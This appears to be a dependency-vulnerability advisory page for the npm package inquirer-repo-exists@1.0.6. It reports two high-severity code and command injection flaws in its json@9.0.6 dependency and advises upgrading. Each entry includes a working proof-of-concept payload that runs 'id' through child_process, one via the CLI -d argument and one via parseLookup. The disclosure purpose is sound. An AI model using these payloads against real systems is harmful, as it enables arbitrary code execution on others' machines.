inquirer-repo-exists@1.0.6

Vulnerabilities

2 via 2 paths

Dependencies

30

Source

npm

high severity

Arbitrary Code Injection

  • Vulnerable module: json
  • Introduced through: json@9.0.6

Detailed paths

  • Introduced through: inquirer-repo-exists@1.0.6 json@9.0.6
    Remediation: Upgrade to json@11.0.0.

Overview

json is a 'json' command tool for massaging and processing JSON on the command line.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the -d argument.

PoC

curl -sL 'https://api.github.com/repos/joyent/node/issues?state=open' | node_modules/json/lib/json.js -a created_at number title -d '""+require(`child_process`).execSync(`id`)//'

Remediation

Upgrade json to version 11.0.0 or higher.

high severity

Command Injection

  • Vulnerable module: json
  • Introduced through: json@9.0.6

Detailed paths

  • Introduced through: inquirer-repo-exists@1.0.6 json@9.0.6
    Remediation: Upgrade to json@10.0.0.

Overview

json is a 'json' command tool for massaging and processing JSON on the command line.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands through the parseLookup function.

PoC

const json = require('json');

// The lookup string is evaluated rather than parsed, so a JavaScript expression
// embedded in it runs with the privileges of the calling process.
const res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]}');
console.log(res);

Remediation

Upgrade json to version 10.0.0 or higher.
